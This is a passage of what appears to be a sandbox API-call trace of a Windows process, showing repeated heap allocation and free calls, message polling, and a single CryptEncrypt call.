lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0139.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0139.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0139.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0139.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0139.974] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0139.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0139.974] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0139.975] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0139.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0139.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0139.975] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0139.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0139.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0139.978] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0139.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0139.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0139.978] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0139.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0139.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0139.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0139.978] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.979] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0139.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0139.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0139.979] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0139.979] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.979] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0139.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0139.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0139.979] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0139.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0139.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0139.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0139.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0139.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0139.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0139.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0139.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0139.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0139.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0139.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0139.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0139.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0139.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0139.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0139.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0139.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0139.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0139.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0139.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0139.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0139.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2cfb0 | out: hHeap=0x970000) returned 1 [0139.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0139.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0139.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0139.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0139.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0139.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0139.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0139.981] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0139.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0139.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0139.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50b00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0139.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e540a8 [0139.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0139.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0139.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0139.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0139.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0139.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0139.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0139.982] CryptEncrypt (in: hKey=0xa87350, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x2a7d, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x2a80) returned 1 [0139.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0139.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0139.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0139.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0139.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0139.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0139.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0139.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0139.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0139.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0139.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0139.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0139.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0139.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0139.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0139.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0139.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0139.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0139.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0139.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0139.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0139.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0139.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0139.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0139.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0139.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0139.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0139.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0139.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0140.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0140.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0140.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0140.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0140.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0140.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0140.085] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0140.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0140.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0140.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0140.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0140.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0140.147] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0140.148] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0140.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0140.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0140.148] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0140.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0140.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0140.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0140.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0140.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0140.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0140.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0140.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0140.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0140.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0140.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0140.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0140.148] CharLowerBuffW (in: lpsz="byte[10880]", cchLength=0xb | out: lpsz="byte[10880]") returned 0xb [0140.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0140.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0140.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0140.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0140.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0140.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0140.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0140.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0140.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0140.149] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0140.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0140.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0140.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0140.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0140.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0140.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0140.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0140.152] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0140.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0140.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0140.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0140.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0140.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0140.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0140.152] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0140.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0140.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0140.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0140.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0140.152] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0140.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0140.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0140.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0140.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0140.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0140.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0140.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0140.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0140.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0140.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0140.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0140.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0140.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0140.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0140.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0140.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0140.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0140.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0140.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0140.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0140.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0140.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0140.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0140.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0140.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0140.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0140.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0140.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0140.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0140.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0140.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0140.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0140.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0140.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0140.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0140.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0140.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0140.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0140.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0140.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0140.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0140.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0140.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0140.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0140.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0140.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0140.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0140.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0140.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0140.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0140.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0140.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0140.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0140.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0140.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977938 [0140.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0140.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0140.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0140.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0140.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0140.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0140.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0140.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0140.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0140.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0140.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0140.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0140.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0140.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2a7d) returned 0x2f2fa38 [0140.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0140.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2fa38 | out: hHeap=0x970000) returned 1 [0140.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0140.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0140.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 